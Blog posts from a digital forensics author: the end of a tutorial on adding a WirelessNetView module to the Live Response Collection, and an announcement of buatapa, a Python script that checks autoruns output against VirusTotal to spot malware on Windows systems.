<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-m9VObK3bd4kcL2H98k7PEpa3aC2rb1JRb-mQfK6X65lICEN79eQQcYUDRRvwJKyMyZiIwvaENHIaaJ1qqcxl-0F0ZjkTGmPKiTMlRTPq-hFb499456saX0KAG9GmW9I1Oo-PsFhxgZIm/s1600/window-module-template.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-m9VObK3bd4kcL2H98k7PEpa3aC2rb1JRb-mQfK6X65lICEN79eQQcYUDRRvwJKyMyZiIwvaENHIaaJ1qqcxl-0F0ZjkTGmPKiTMlRTPq-hFb499456saX0KAG9GmW9I1Oo-PsFhxgZIm/s640/window-module-template.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Contents of Windows-Module-Template.bat</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Once you have it open, save it as the tool name that you would like to run. In this case, I would open the file </span><span style="font-size: large;">"Windows-Module-Template.bat"</span><span style="font-size: large;"> and save it as "wirelessnetview.bat". </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0UQRJSq42pjf0LDmSAHyKEc8iH1YP6_lfKvCEn9lsUOibJkUBylJFk2jCBU0ZKK3l1T5-I58VZejRKGUn8eBE-SLKzRR9d6wZukWSZ9qyMHCbnOwmGkom_Sy9E5iPfSgV2BD9Z7FSjd0m/s1600/wirelssnetview-saving.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0UQRJSq42pjf0LDmSAHyKEc8iH1YP6_lfKvCEn9lsUOibJkUBylJFk2jCBU0ZKK3l1T5-I58VZejRKGUn8eBE-SLKzRR9d6wZukWSZ9qyMHCbnOwmGkom_Sy9E5iPfSgV2BD9Z7FSjd0m/s640/wirelssnetview-saving.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Saving the template as our new module</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now you can begin to edit the "wirelessnetview.bat" module and add more functionality to the LRC! </span><br />
<span style="font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-size: large;"><u><b>Writing the module</b></u></span></div>
<br />
<br />
<div style="text-align: center;">
<span style="font-size: large;"><br /></span></div>
<span style="font-size: large;">I tried to make it as easy as possible to do substitutions within the template, so really the only things you will have to do are:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">1) Have an understanding of what command line arguments you need to give your executable file (or system command), and </span><br />
<span style="font-size: large;">2) Be able to find and replace text within your new batch script</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">You should not have to change any of the environment and script variables, so I will not cover them in great detail, unless a specific request is made to do so. Here is a full listing of the items that you should replace (Ctrl + H in most cases):</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">YYYYMMDD - Four digit year, two digit month, and two digit day (19970829, 20150915)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">DD - Date you wrote the module, with two digits (03, 11, 24, 31)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Month - Month you wrote the module (July, March, December)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">YYYY - Year you wrote the module (2015, 2016, 4545)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Your Name] - Your name, if you want to put it in there (Brian Moran, Leeroy Jenkins)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[you@emailaddress] - Your email address, if you want to put it in there (tony@starkindustries.com, info@mrrobot.com)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Twitter name] - Your Twitter name, if you want to put it in there (Captain America, Star Wars)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[@Twitterhandle] - </span><span style="font-size: large;">Your Twitter handle, if you want to put it in there (@captainamerica, @starwars</span><span style="font-size: large;">)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[MODULENAME] - What you want to call your module. I prefer to use the tool name, so in this case WIRELESSNETVIEW</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Tool path] - This is the path, within the tools folder, of the folder name and the exe. In this case, it would be wirelessnetview\WirelessNetView.exe</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[command line arguments] - This is where you have to do some testing of running your tool from the command line before you create the module. In this particular case, I am going to use what is listed on the web page as the command I want to run. The full command is </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>WirelessNetView.exe /shtml "f:\temp\wireless.html"</i>, so our [command line arguments] in this case would be </span><span style="font-size: large;">/shtml</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Output folder] - The folder that you want to output the data to. Since this is network related, saving it under "</span><span style="font-size: large;">NetworkInfo" seems like a good idea.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Output file name and file extension] - The filename that you want to save the file as. Generally I make this the name of the tool, so I would call this one "Wirelessnetview.html".</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Tool name] - The name of the tool. (Wirelessnetview)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Executable name] - The name of the executable (WirelessNetView.exe)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Executable download location, if applicable] - The URL where you downloaded the tool from (in this case, http://www.nirsoft.net/utils/wireless_network_view.html)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">And that is it!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>**Please note that you can choose between modifying saving output directly, or saving output from the executable/command itself. It is best to refer to the executable or system command when trying to determine "how" you should save the output.**</b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">So when we modify the wirelessnetview.bat file, we replace the following items with their value:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">YYYYMMDD - is replaced with 20150917</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">DD - is replaced with 17</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Month - is replaced with September</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">YYYY - is replaced with 2015</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Your Name] - is replaced with Brian Moran</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[you@emailaddress] - is replaced with brian@brimorlabs.com</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Twitter name] - is replaced with BriMor Labs</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[@Twitterhandle] - is replaced with @BriMorLabs</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[MODULENAME] - is replaced with WIRELESSNETVIEW</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Tool path] - is replaced with wirelessnetview\WirelessNetView.exe</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[command line arguments] - is replaced with </span><span style="font-size: large;">/shtml</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Output folder] - is replaced with </span><span style="font-size: large;">NetworkInfo</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Output file name and file extension] - is replaced with Wirelessnetview.html</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Tool name] - is replaced with Wirelessnetview</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Executable name] - is replaced with WirelessNetView.exe</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Executable download location, if applicable] - is replaced with http://www.nirsoft.net/utils/wireless_network_view.html</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfSrNjvp3AE2vt6Gv_B4VN0t4KpV7BtG8t59bRp-iocQOZkNXBM-rFVkOQ9ZWQaSbeU-z7WCASfVkCfPFZZtkTUEzASsVa2GHAUiZHyhEHbAdeDzkzIvTEc9nluSKjrpV6M50Xs1-8cuzM/s1600/snippet-of-wnv.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfSrNjvp3AE2vt6Gv_B4VN0t4KpV7BtG8t59bRp-iocQOZkNXBM-rFVkOQ9ZWQaSbeU-z7WCASfVkCfPFZZtkTUEzASsVa2GHAUiZHyhEHbAdeDzkzIvTEc9nluSKjrpV6M50Xs1-8cuzM/s640/snippet-of-wnv.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Screenshot of our new module, after replacing the text!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now that our module is written, we have to add the module to whichever batch scripts we would like. I usually like to keep the modules that perform similar functions near each other, so in this case I am going to choose to add it after the PRCVIEWMODULE. The easiest way to do this is simply copy the five lines of text associated with the PRCVIEWMODULE entry, and paste it below it.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirq4rW0yzlYRp8kVnPW61gq6_MyUwGwOh7RGcw9-0TGt7EGsWNghZMxPSZ8_AEvAxFipay4VzQEhhEei1M-Qro26Kt5d8KoahHrKGhKZN5B1ngInt6127SRk73T3Cob2xeUMz7cF4Sjyov/s1600/adding+module.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirq4rW0yzlYRp8kVnPW61gq6_MyUwGwOh7RGcw9-0TGt7EGsWNghZMxPSZ8_AEvAxFipay4VzQEhhEei1M-Qro26Kt5d8KoahHrKGhKZN5B1ngInt6127SRk73T3Cob2xeUMz7cF4Sjyov/s640/adding+module.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Selecting the code associated with PRCVIEWMODULE</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Xh32SdE1h37c7dMy0CzW0Xm1vR4XbvIwyLEIKdH-AJJKQOajNlSj8t5of983d7SUYnD_EyGDhhDb3lgBydNg_VN-9siRKmx2B6fH3KmcBjrWM_DIPGerwCk85tPLW04Lr0XmTCk2g33d/s1600/copied_module.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Xh32SdE1h37c7dMy0CzW0Xm1vR4XbvIwyLEIKdH-AJJKQOajNlSj8t5of983d7SUYnD_EyGDhhDb3lgBydNg_VN-9siRKmx2B6fH3KmcBjrWM_DIPGerwCk85tPLW04Lr0XmTCk2g33d/s640/copied_module.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Copying the code associated with PRCVIEWMODULE to create a new subroutine for our new module</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Once you have it copied, change the line <i>GOTO ....MODULE</i> in the original module to the name of your new module. In this case, we would change it to GOTO WIRELESSNETVIEWMODULE. </span><span style="font-size: large;">Then change the name of the subroutine itself to the name of your module, in this case WIRELESSNETVIEWMODULE. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7D1j3shUVAC0GXbe3slmdnMlj2YRqKHY5cqAbfUWaIt1mLIBub0bPyTo0YBdgzyFFWQNYrxEuwg0eSeE7n39FImT5QJPPTFMRpC5u7p8BYKc61YbGmiUsUcrjep24_8a-Yj_j6uBpgYJo/s1600/addingwnvmodule.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7D1j3shUVAC0GXbe3slmdnMlj2YRqKHY5cqAbfUWaIt1mLIBub0bPyTo0YBdgzyFFWQNYrxEuwg0eSeE7n39FImT5QJPPTFMRpC5u7p8BYKc61YbGmiUsUcrjep24_8a-Yj_j6uBpgYJo/s640/addingwnvmodule.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Adding WIRELESSNETVIEWMODULE code</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Finally, change the name of the batch script that is being called to the name of your newly created script, then save it. That is it, you are all done!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKR-FIG8gBONskKzcSvw_tWeii06OUvmR1UCnhxS8l0c29rYFd37lHQHzsdgegvkyqNikQL25S0YmG1blgirD8ehMy8jsQsiub3K4rEXSBTnWkZU0NZfKQoPzs82BxgP5uhW36xGGH0a99/s1600/alldone.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKR-FIG8gBONskKzcSvw_tWeii06OUvmR1UCnhxS8l0c29rYFd37lHQHzsdgegvkyqNikQL25S0YmG1blgirD8ehMy8jsQsiub3K4rEXSBTnWkZU0NZfKQoPzs82BxgP5uhW36xGGH0a99/s640/alldone.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i style="font-size: 12.8px;"><span style="font-size: small;">Our module is fully added!</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">It is best to run your module(s) on a test system before deploying it widely, just to ensure that everything works properly. Also ensure that you add the code for your new module to each of the six batch scripts, if you so desire. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I hope that this tutorial has been helpful, please do not hesitate to contact me if you have any additional questions or comments as you create your own modules for the Live Response Collection!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<br />
<a href="https://www.brimorlabs.com/Tools/LiveResponseCollection-Cedarpelta.zip" style="font-size: x-large;" target="_blank">LiveResponseCollection-Cedarpelta.zip - download here</a><span style="font-size: large;"> </span><br />
<br style="font-size: x-large;" />
<span style="font-size: large;">MD5: 7bc32091c1e7d773162fbdc9455f6432</span><br />
<span style="font-size: large;">SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63</span><br />
<span style="font-size: large;">Updated: September 5, 2019</span><br />
<div>
<span style="font-size: large;"><br /></span></div>
<div>
<span style="font-size: large;"><br /></span></div>
<span style="font-size: large;"><br /></span><span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-29993176305514404182015-08-26T12:02:00.002-04:002018-01-30T11:06:20.638-05:00Publicly announcing buatapa!!<br />
<span style="font-size: large;">Hello again readers and welcome back! Today's blog post is going to cover a small script that I developed called "buatapa". This was meant to be released several months ago, but steady case work has kept me busy. I finally carved out some development time to finish up this blog post and push it out publicly at long last!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<b><span style="font-size: x-large;">buatapa</span></b><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">According to the magic of Google Translate, "bua tapa" is the Irish Gaelic translation of the phrase "quick win". </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pfLqciSeHIDrxWN5fZEU9SLylVbZJHSQE3glDoH4gsuLv2tJAk_C6JCi0COvh7qCNkdtrqWqRQMfdMLmg7kQ_RojllaIDo9YM9ecg4p4RVpYr5fzS6HeNLQqDxQo9_Z5upEzhEYeBGXJ/s1600/where_buatapa_came_from.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pfLqciSeHIDrxWN5fZEU9SLylVbZJHSQE3glDoH4gsuLv2tJAk_C6JCi0COvh7qCNkdtrqWqRQMfdMLmg7kQ_RojllaIDo9YM9ecg4p4RVpYr5fzS6HeNLQqDxQo9_Z5upEzhEYeBGXJ/s1600/where_buatapa_came_from.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>The phrase "quick win" translated to Irish Gaelic, thanks to Google Translate!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;">I decided to call my (GASP!) first publicly released Python script "buatapa" for a couple of reasons, with the main reasons being that it is very heavily based off of <a href="https://twitter.com/bbaskin" target="_blank">Brian Baskin's</a> <a href="https://github.com/Rurik/Noriben" target="_blank">noriben personal malware sandbox</a>, so I wanted to have a cool name for it as well. The results of this script have the potential to indeed give you a "quick win" with trying to find malware on a Windows system.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b><u>What buatapa does</u></b></span><br />
<span style="font-size: large;"><br /></span><span style="font-size: large;">The purpose of this script is to collect the data and then run the script against the collected data from a second machine (rather than performing the VirusTotal queries from the suspected compromised system itself) in case there is no network connectivity on the suspected compromised system (like a secured environment, POS environment, etc.) I</span><span style="font-size: large;">t simply works by parsing the results of autoruns.csv that is generated by Sysinternals autoruns on a Windows system. The script finds Unicode characters, anything that resembles a poweliks Registry entry, and anything that does not have a signed certificate. It then attempts to perform a VirusTotal hash lookup for any files with abnormal characters and unsigned entries and returns the results in an easy to read text file. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><b><u>How to set up buatapa</u></b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The first thing that is required to get the fullest functionality is to get a VirusTotal API. You can get your public API by heading over to VirusTotal and signing up for an account, if you do not already have one. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Once you have your account, login to VirusTotal and choose the option under your username of "My API key"</span><br />
<br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnZqSvKf6C54oSubAjUbiRGFDDL05bWqfn6Xw2HfoFbzRGVF7_HhSCKHozbff_KCQje82DsakmiIekD0hTQXBSEdW8jDhapKb6k80pnj-YYuvIkkQMcBtkVfjCg_0HFLY371lRczlJHzJS/s1600/vt-login-apikey.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnZqSvKf6C54oSubAjUbiRGFDDL05bWqfn6Xw2HfoFbzRGVF7_HhSCKHozbff_KCQje82DsakmiIekD0hTQXBSEdW8jDhapKb6k80pnj-YYuvIkkQMcBtkVfjCg_0HFLY371lRczlJHzJS/s1600/vt-login-apikey.jpg" width="610" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>"My API key" option on VirusTotal</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">When you choose that option, you will be presented with a page like this, which contains your API key. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw6tb2MbUaqOjhOL4q0Pzj53nGF6nxU2e00mW2BhFRv1xBINiazjkUV6FjvdSTbsz2xwaBuOGIUGTV0DaOYTWHvqsgqMgFEbinunb4ZhbKZW5HQC0iSQvzv8BlgsyeaNUjgsFnxtFS47jQ/s1600/page-with-api-key.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="546" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw6tb2MbUaqOjhOL4q0Pzj53nGF6nxU2e00mW2BhFRv1xBINiazjkUV6FjvdSTbsz2xwaBuOGIUGTV0DaOYTWHvqsgqMgFEbinunb4ZhbKZW5HQC0iSQvzv8BlgsyeaNUjgsFnxtFS47jQ/s1600/page-with-api-key.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Page with your API key, settings, and rate limits</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Note that the public API has rate limit queries, which are built into the script automatically (rather than running four in a minute and then waiting for 60 seconds; I chose to do one query every 15 seconds. You can of course modify the script to change the sleep time and query rate if you would like).</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Highlight your API key and input it into the script. (It is the exact same code as Noriben, so if you are familiar with that, you should be familiar with this.)</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE6bH206acX9zE4rJvm5NEezY31KXTlNHmEX7usqD_a0lgdsu_i9P_PObyqEV-EB2WUZGbzrnMZ0fpZ5hQWhtc1fO1QNtUHdLOqccFQ9lnwviatYKr6q8JLS8K1Xaq3MkLK9sn3wgk_6WU/s1600/put_in_api_key.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE6bH206acX9zE4rJvm5NEezY31KXTlNHmEX7usqD_a0lgdsu_i9P_PObyqEV-EB2WUZGbzrnMZ0fpZ5hQWhtc1fO1QNtUHdLOqccFQ9lnwviatYKr6q8JLS8K1Xaq3MkLK9sn3wgk_6WU/s1600/put_in_api_key.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Copy the API key to here (or here) in the script (buatapa and/or noriben)</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">It is very important to also install the "requests" Python library to your Python distribution if you have not already. I once again defer to Brian Baskin's Python experience (which admittedly dwarfs my own) as he stated:</span><br />
<span style="font-size: large;"><br /></span>
<i><span style="font-size: large;">"Without Requests it cannot do VirusTotal queries. That's the only internet-based functionality. So you have to install requests ("pip install requests")...Requests is the HTTP library that I use. The built-in Python libs are horrible."</span></i><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">So, make sure that you type in run the command 'pip install requests' from a command prompt before you run buatapa or noriben, in order to get the internet functionality that is needed to run the scripts!!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRoAqJGffInY32gNczHiL8pO8x3d4OOu5k8lA7kgnwRtS2Wdno_nRxIuQwxojdC40F1xkjoeeAsyQh9mUQQ2jMFRca3LJCrr7vwybwFzbPlfn3flHEJedO9dz-5HawWHPnp2Me5Q6tD0mG/s1600/pipinstall.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRoAqJGffInY32gNczHiL8pO8x3d4OOu5k8lA7kgnwRtS2Wdno_nRxIuQwxojdC40F1xkjoeeAsyQh9mUQQ2jMFRca3LJCrr7vwybwFzbPlfn3flHEJedO9dz-5HawWHPnp2Me5Q6tD0mG/s640/pipinstall.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Type in 'pip install requests' from a command prompt to install Requests</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<b style="font-size: x-large;"><u>Running buatapa</u></b><br />
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;">You will have to have Python either natively installed on your system or be running something like Active State Python in order to run buatapa. In order to run buatapa, simply open a command prompt and give the path of where the buatapa script resides. The script will automatically create the output text file in the directory the script was run from, so make sure you have read/write permissions to that directory. For example, don't run it from C:\Windows\System32 unless you open the command prompt with Administrative privileges. You must give the script the "-c" argument to open the autoruns.csv file. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNI4A-px97baDO1FQbDKUOn7Oepu4nj7VOsvmnqlKkpVk2ccVg-KWq7SLpQFluAA6tpDwkBHQDBiB76IZTNHNQzkmdvAknzMSz80_tQAPmKlZzcJICD_lP9np4y5gWO0N01-eupWDLmyST/s1600/buatapa-running-commandline.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNI4A-px97baDO1FQbDKUOn7Oepu4nj7VOsvmnqlKkpVk2ccVg-KWq7SLpQFluAA6tpDwkBHQDBiB76IZTNHNQzkmdvAknzMSz80_tQAPmKlZzcJICD_lP9np4y5gWO0N01-eupWDLmyST/s640/buatapa-running-commandline.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>The results from running buatapa (NOTE: The script is name "personal_buatapa.py" because it has my API key in it)</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">You do not have to use the Live Response Collection to create the autoruns.csv file (although I did include the output in the latest update, to make life easier for you if you do), however you do indeed have to have the output of autoruns saved as a csv for buatapa to process the file. The text output of autoruns, while easier for human reading, is more difficult to parse and correlate than the csv version.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b><u>Results from buatapa</u></b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The results are saved as a text file, named "$DATE_$TIME_buatapa_output.txt" (for example 20150825_181703_buatapa_output.txt), with all of the information that autoruns collects about the suspected entry presented in an easy to read text format. If a VirusTotal hit is found, the scan date, detection ration, and VirusTotal report URL will be presented at the very top of the entry. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwvnr1kKqbP2DEZlo4VQSS0dAgEaZI4lgNRCdkgJmxjuEosWMTuW1G0nJhyphenhyphenLsFTyeEBjEjV0gsqdC_zNDA-LbK5DF8bedrVbSEMDS7B6C3fC0x65vm_ZkH6Cf3v0tEp0lJHtqOt8DRwgsf/s1600/snippet-buatapa-results.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwvnr1kKqbP2DEZlo4VQSS0dAgEaZI4lgNRCdkgJmxjuEosWMTuW1G0nJhyphenhyphenLsFTyeEBjEjV0gsqdC_zNDA-LbK5DF8bedrVbSEMDS7B6C3fC0x65vm_ZkH6Cf3v0tEp0lJHtqOt8DRwgsf/s640/snippet-buatapa-results.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Screenshot of a snippet of the buatapa output</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
